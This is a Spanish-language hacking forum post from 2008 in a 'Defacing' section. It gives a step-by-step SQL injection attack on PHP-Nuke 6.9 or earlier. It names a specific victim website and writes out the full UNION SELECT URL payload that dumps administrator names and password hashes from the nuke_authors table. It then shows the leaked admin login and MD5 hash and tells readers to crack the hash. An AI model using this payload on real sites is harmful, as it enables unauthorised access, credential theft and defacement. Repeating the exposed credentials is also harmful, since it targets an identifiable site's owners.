hackcrack24
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.


Nueva pagina hackcrack24: www.hackcrack24.com.ar
 
ÍndiceÍndice  PortalPortal  Últimas imágenesÚltimas imágenes  BuscarBuscar  RegistrarseRegistrarse  ConectarseConectarse  

 

 Php Nuke 6.9 o anterior

Ir abajo 
AutorMensaje
hacker-24
Admintrador



Cantidad de envíos : 45
Fecha de inscripción : 12/05/2008

Php Nuke 6.9 o anterior Empty
MensajeTema: Php Nuke 6.9 o anterior   Php Nuke 6.9 o anterior EmptySáb Jul 26, 2008 2:44 am

Php Nuke 6.9 o anterior

* www.digital-system.org - csuser.x[at]gmail[dot]com

########################################################################################


Php Nuke 6.9 o anterior


La explicación a continuación consiste en Nuke Inyeccion, es una clase de defaced que
permite que se agregue un administrador más a un sitio php nuke version 6.9 o menor.

Lo primero que tenemos que hacer es buscar una web victima, cuya web php sea de versión
6.9 o anterior, para la explicación se encontró la siguiente:

http://www.pasionflamenca.com/

Luego de que se encuentre el website a atacar se inserta en la URL la siguiente cadena:

******
modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
******

Quedaria así:

******
http://www.pasionflamenca.com/modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
******

Al realizar eso ella nos proporcionará el nombre de usuario y el pass encriptado en md5
de los administradores de ese website...

En el caso del que escogimos sería este:

66ad52318087f29b3bafc774c0166478
Enviado por waxx el Thursday, 01 January a las 00:59:59
Adjuntar al Artículo:
(0 responde)

Donde:

66ad52318087f29b3bafc774c0166478 (Es el "pass" del admin.php encriptado en Md5)
"waxx" (Es el "login" del admin.php de la web atacada)

Ahora buscamos un crackeador Md5, colocamos la respuesta que nos dió la técnica antes
hecha y obtendremos el password del administrador.









hacker-24
Volver arriba Ir abajo
https://hackcrack24.activo.mx
 
Php Nuke 6.9 o anterior
Volver arriba 
Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
hackcrack24 :: Informatica :: Defacing-
Cambiar a: